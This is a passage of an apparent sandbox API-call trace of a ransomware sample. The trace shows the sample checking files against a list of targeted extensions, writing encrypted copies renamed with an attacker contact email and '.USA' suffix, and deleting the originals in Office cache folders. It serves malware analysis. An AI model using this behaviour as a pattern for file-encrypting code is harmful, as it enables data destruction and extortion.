lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.472] WriteFile (in: hFile=0x180, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.472] SetEndOfFile (hFile=0x180) returned 1 [0034.473] CloseHandle (hObject=0x180) returned 1 [0034.473] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.473] SetEndOfFile (hFile=0x170) returned 1 [0034.474] CloseHandle (hObject=0x170) returned 1 [0034.474] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.474] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.475] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.475] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.475] lstrlenW (lpString=".doc") returned 4 [0034.475] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.475] lstrlenW (lpString=".docx") returned 5 [0034.475] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.475] lstrlenW (lpString=".pdf") returned 4 [0034.475] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.475] lstrlenW (lpString=".xls") returned 4 [0034.475] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.475] lstrlenW (lpString=".xlsx") returned 5 [0034.475] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.475] lstrlenW (lpString=".ppt") returned 4 [0034.475] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.475] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.475] lstrlenW (lpString=".zip") returned 4 [0034.475] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.475] lstrlenW (lpString=".rar") returned 4 [0034.475] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.475] lstrlenW (lpString=".bz2") returned 4 [0034.475] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.475] lstrlenW (lpString=".7z") returned 3 [0034.475] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.475] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.475] lstrlenW (lpString=".dbf") returned 4 [0034.475] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.476] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.476] lstrlenW (lpString=".1cd") returned 4 [0034.476] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.476] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.476] lstrlenW (lpString=".jpg") returned 4 [0034.476] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.476] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.476] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.476] lstrlenW (lpString=".doc") returned 4 [0034.476] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.476] lstrlenW (lpString=".docx") returned 5 [0034.476] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.476] lstrlenW (lpString=".pdf") returned 4 [0034.476] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.476] lstrlenW (lpString=".xls") returned 4 [0034.476] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.476] lstrlenW (lpString=".xlsx") returned 5 [0034.476] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.476] lstrlenW (lpString=".ppt") returned 4 [0034.476] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.476] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.476] lstrlenW (lpString=".zip") returned 4 [0034.476] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.476] lstrlenW (lpString=".rar") returned 4 [0034.476] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.476] lstrlenW (lpString=".bz2") returned 4 [0034.476] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.476] lstrlenW (lpString=".7z") returned 3 [0034.476] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.476] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.476] lstrlenW (lpString=".dbf") returned 4 [0034.477] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.477] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.477] lstrlenW (lpString=".1cd") returned 4 [0034.477] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.477] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.477] lstrlenW (lpString=".jpg") returned 4 [0034.477] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.477] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.477] lstrlenW (lpString="Setup.xml") returned 9 [0034.477] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0034.477] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=2362) returned 1 [0034.477] CloseHandle (hObject=0x170) returned 1 [0034.477] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.477] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.477] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0034.478] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.478] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.478] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0034.478] GetLastError () returned 0x0 [0034.478] ReadFile (in: hFile=0x170, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x93a, lpOverlapped=0x0) returned 1 [0034.479] WriteFile (in: hFile=0x180, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x940, lpOverlapped=0x0) returned 1 [0034.483] ReadFile (in: hFile=0x170, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.483] WriteFile (in: hFile=0x180, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.483] SetEndOfFile (hFile=0x180) returned 1 [0034.483] CloseHandle (hObject=0x180) returned 1 [0034.484] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.484] SetEndOfFile (hFile=0x170) returned 1 [0034.485] CloseHandle (hObject=0x170) returned 1 [0034.485] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.485] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.485] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.485] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.485] lstrlenW (lpString=".doc") returned 4 [0034.485] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.485] lstrlenW (lpString=".docx") returned 5 [0034.485] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.485] lstrlenW (lpString=".pdf") returned 4 [0034.485] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.485] lstrlenW (lpString=".xls") returned 4 [0034.485] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.485] lstrlenW (lpString=".xlsx") returned 5 [0034.485] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.486] lstrlenW (lpString=".ppt") returned 4 [0034.486] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.486] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.486] lstrlenW (lpString=".zip") returned 4 [0034.486] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.486] lstrlenW (lpString=".rar") returned 4 [0034.486] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.486] lstrlenW (lpString=".bz2") returned 4 [0034.486] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.486] lstrlenW (lpString=".7z") returned 3 [0034.486] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.486] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.486] lstrlenW (lpString=".dbf") returned 4 [0034.486] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.486] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.486] lstrlenW (lpString=".1cd") returned 4 [0034.486] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.486] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.486] lstrlenW (lpString=".jpg") returned 4 [0034.486] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.486] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.486] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.486] lstrlenW (lpString=".doc") returned 4 [0034.486] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.486] lstrlenW (lpString=".docx") returned 5 [0034.486] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.486] lstrlenW (lpString=".pdf") returned 4 [0034.486] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.486] lstrlenW (lpString=".xls") returned 4 [0034.486] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.486] lstrlenW (lpString=".xlsx") returned 5 [0034.487] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.487] lstrlenW (lpString=".ppt") returned 4 [0034.487] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.487] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.487] lstrlenW (lpString=".zip") returned 4 [0034.487] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.487] lstrlenW (lpString=".rar") returned 4 [0034.487] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.487] lstrlenW (lpString=".bz2") returned 4 [0034.487] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.487] lstrlenW (lpString=".7z") returned 3 [0034.487] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.487] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.487] lstrlenW (lpString=".dbf") returned 4 [0034.487] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.487] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.487] lstrlenW (lpString=".1cd") returned 4 [0034.487] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.487] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.487] lstrlenW (lpString=".jpg") returned 4 [0034.487] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.487] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.487] lstrlenW (lpString="InfoPathMUI.xml") returned 15 [0034.487] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0034.488] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=1231) returned 1 [0034.488] CloseHandle (hObject=0x170) returned 1 [0034.488] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml")) returned 0x2020 [0034.488] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.489] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0034.489] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.489] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.489] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0034.489] GetLastError () returned 0x0 [0034.489] ReadFile (in: hFile=0x170, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x4cf, lpOverlapped=0x0) returned 1 [0034.543] WriteFile (in: hFile=0x180, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x4d0, lpOverlapped=0x0) returned 1 [0034.544] ReadFile (in: hFile=0x170, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.544] WriteFile (in: hFile=0x180, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xf2, lpOverlapped=0x0) returned 1 [0034.545] SetEndOfFile (hFile=0x180) returned 1 [0034.545] CloseHandle (hObject=0x180) returned 1 [0034.545] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.545] SetEndOfFile (hFile=0x170) returned 1 [0034.546] CloseHandle (hObject=0x170) returned 1 [0034.546] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.546] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml")) returned 1 [0034.547] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.547] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.547] lstrlenW (lpString=".doc") returned 4 [0034.547] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.547] lstrlenW (lpString=".docx") returned 5 [0034.547] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.547] lstrlenW (lpString=".pdf") returned 4 [0034.547] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.547] lstrlenW (lpString=".xls") returned 4 [0034.547] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.547] lstrlenW (lpString=".xlsx") returned 5 [0034.547] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.547] lstrlenW (lpString=".ppt") returned 4 [0034.547] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.547] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.547] lstrlenW (lpString=".zip") returned 4 [0034.547] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.547] lstrlenW (lpString=".rar") returned 4 [0034.547] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.547] lstrlenW (lpString=".bz2") returned 4 [0034.547] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.547] lstrlenW (lpString=".7z") returned 3 [0034.547] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.547] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.547] lstrlenW (lpString=".dbf") returned 4 [0034.547] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.547] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.547] lstrlenW (lpString=".1cd") returned 4 [0034.547] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.547] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.548] lstrlenW (lpString=".jpg") returned 4 [0034.548] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.548] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.548] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.548] lstrlenW (lpString=".doc") returned 4 [0034.548] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.548] lstrlenW (lpString=".docx") returned 5 [0034.548] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.548] lstrlenW (lpString=".pdf") returned 4 [0034.548] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.548] lstrlenW (lpString=".xls") returned 4 [0034.548] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.548] lstrlenW (lpString=".xlsx") returned 5 [0034.548] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.548] lstrlenW (lpString=".ppt") returned 4 [0034.548] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.548] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.548] lstrlenW (lpString=".zip") returned 4 [0034.548] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.548] lstrlenW (lpString=".rar") returned 4 [0034.548] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.548] lstrlenW (lpString=".bz2") returned 4 [0034.548] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.548] lstrlenW (lpString=".7z") returned 3 [0034.548] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.548] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.548] lstrlenW (lpString=".dbf") returned 4 [0034.548] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.548] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.548] lstrlenW (lpString=".1cd") returned 4 [0034.548] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.549] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.549] lstrlenW (lpString=".jpg") returned 4 [0034.549] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.549] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.549] lstrlenW (lpString="Setup.xml") returned 9 [0034.549] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0034.881] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=1872) returned 1 [0034.881] CloseHandle (hObject=0x19c) returned 1 [0034.881] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.881] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.882] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0034.882] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.882] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.882] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.882] GetLastError () returned 0x0 [0034.882] ReadFile (in: hFile=0x19c, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x750, lpOverlapped=0x0) returned 1 [0034.886] WriteFile (in: hFile=0x1a4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, 